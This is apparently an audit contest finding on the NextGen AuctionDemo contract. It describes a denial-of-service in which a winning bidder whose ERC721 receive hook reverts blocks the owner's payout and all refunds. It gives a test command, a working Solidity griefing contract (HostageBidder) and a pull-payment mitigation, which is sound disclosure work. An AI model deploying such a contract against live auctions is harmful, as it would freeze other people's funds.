Malicious winner can hold an auction hostage #1925
Labels
- 2 (Med Risk): Assets not at direct risk, but function/availability of the protocol could be impacted or leak value
- bug: Something isn't working
- duplicate-739
- partial-50: Incomplete articulation of vulnerability; eligible for partial credit only (50%)
Lines of code
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L104-L120
Vulnerability details
Impact
A contract that wins an auction can postpone the owner's and the refundees' payments indefinitely.
Proof of Concept
At the time of winning, the auction contract holds the owner's sale proceeds (equal to the winning bid) and also holds the funds of all non-winning bids. When an auction concludes, the owner and the refundees are expected to receive their payments. To distribute these funds, either an Admin or the winner of the auction has to call `claimAuction(...)`. The issue is that a malicious actor can bid and win through a contract whose `onERC721Received()` hook reverts. In that case `claimAuction(...)` will revert when it attempts to `safeTransferFrom(...)` the NFT to the malicious bidder, because the NFT transfer, the owner's payout and every refund are executed in that single call. In such a manner a malicious winner has final authority over when, and whether, the owner and the refundees get their payments. Note that this does require financial commitment from the malicious winner (i.e. he has to win the auction); however, the funds that are withheld (the owner's proceeds plus every losing bid) exceed what he commits.
Additional Note
The same idea of bricking an auction's funds and NFT, at significantly lower cost (e.g. 1 wei + gas fees), can be executed by a malicious bidder that front-runs the first bid through a contract that implements a "return bomb" (memory expansion & copy attack) in its `fallback()` function; this causes `claimAuction(...)` to revert when it attempts to refund the 1 wei bidder. This finding will most likely be deemed OOS because of [L-18] in the bot findings; nevertheless, I am noting it here for the sponsor's and judge's reference since it implies severe consequences.
Coded POC
Test location: `/test`
Run: `forge test --match-test testForcedRevert`
Expected result: `claimAuction(...)` reverts.
Tools Used
Manual Inspection
Recommended Mitigation Steps
Separate the logic of claiming the NFT, paying the owner & refunding refundees.
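The two halves of this report in working Solidity, added here as an illustration and not code from the original issue or from the NextGen repository: a bidder contract of the kind the Proof of Concept describes, whose `onERC721Received()` reverts until its owner allows it, and a hypothetical `PullSettlementAuction` that applies the recommended mitigation by splitting settlement into three independent pull legs. The interfaces, the contract and function names (`HostageBidder`, `execute`, `PullSettlementAuction`, `bid`, `claimNft`, `withdrawProceeds`, `withdrawRefund`), and the assumption that the auction contract custodies both the NFT and the bid ETH are all choices made for this example; the real `AuctionDemo` bid entry point is deliberately not named.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Minimal interfaces, assumed here; not the NextGen contracts.
interface IERC721 {
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface IERC721Receiver {
    function onERC721Received(address, address, uint256, bytes calldata) external returns (bytes4);
}

/// Bidder contract of the kind the report describes: it can place bids, but its
/// ERC721 receive hook reverts until its owner flips a switch, so a settlement that
/// pushes the NFT to it in the same transaction as the payouts reverts as well.
contract HostageBidder is IERC721Receiver {
    address public immutable owner;
    bool public acceptNft; // false by default: the winner decides when settlement may succeed

    constructor() { owner = msg.sender; }
    receive() external payable {}

    /// Forward an arbitrary call with ETH, e.g. the auction's bid entry point (not named here).
    function execute(address target, bytes calldata data) external payable {
        require(msg.sender == owner, "not owner");
        (bool ok, ) = target.call{value: msg.value}(data);
        require(ok, "call failed");
    }

    function setAcceptNft(bool v) external {
        require(msg.sender == owner, "not owner");
        acceptNft = v;
    }

    function onERC721Received(address, address, uint256, bytes calldata) external view override returns (bytes4) {
        require(acceptNft, "hostage: not accepting yet"); // safeTransferFrom, and so a push-style claimAuction, reverts here
        return IERC721Receiver.onERC721Received.selector;
    }
}

/// Hypothetical auction written for this example: it custodies the NFT and all bid ETH,
/// and settlement is split so that each party pulls its own leg.
contract PullSettlementAuction {
    IERC721 public immutable nft;
    uint256 public immutable tokenId;
    address public immutable seller;
    uint256 public immutable endTime;

    address public highestBidder;
    uint256 public highestBid;
    mapping(address => uint256) public refunds; // outbid ETH, pulled by each bidder
    bool public nftClaimed;
    bool public proceedsClaimed;

    constructor(IERC721 _nft, uint256 _tokenId, uint256 duration) {
        nft = _nft;
        tokenId = _tokenId;
        seller = msg.sender;
        endTime = block.timestamp + duration;
    }

    function bid() external payable {
        require(block.timestamp < endTime, "auction ended");
        require(msg.value > highestBid, "bid too low");
        if (highestBidder != address(0)) refunds[highestBidder] += highestBid; // credit, never push
        highestBidder = msg.sender;
        highestBid = msg.value;
    }

    // The vulnerable shape the report describes is a single push-everything claim:
    // safeTransferFrom to the winner, pay the seller, loop over refunds. One reverting
    // receiver strands every other payout. Instead, three independent legs:

    function claimNft() external {
        require(block.timestamp >= endTime, "auction live");
        require(msg.sender == highestBidder, "not winner");
        require(!nftClaimed, "already claimed");
        nftClaimed = true;
        nft.safeTransferFrom(address(this), msg.sender, tokenId); // a reverting hook now hurts only the winner
    }

    function withdrawProceeds() external {
        require(block.timestamp >= endTime, "auction live");
        require(msg.sender == seller, "not seller");
        require(!proceedsClaimed, "already claimed");
        proceedsClaimed = true;
        (bool ok, ) = seller.call{value: highestBid}("");
        require(ok, "transfer failed");
    }

    function withdrawRefund() external {
        uint256 amount = refunds[msg.sender];
        require(amount > 0, "nothing to refund");
        refunds[msg.sender] = 0; // effects before interaction
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```

With `HostageBidder` as the highest bidder, a push-everything claim reverts at the `safeTransferFrom` and nobody is paid; with the split settlement, `withdrawProceeds()` for the seller and `withdrawRefund()` for every outbid address succeed no matter what the winner's hook does. The same separation covers the cheaper variant in the Additional Note: a 1 wei bidder with a return-bomb `fallback()` can only break its own `withdrawRefund()` leg.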
Assessed type
DoS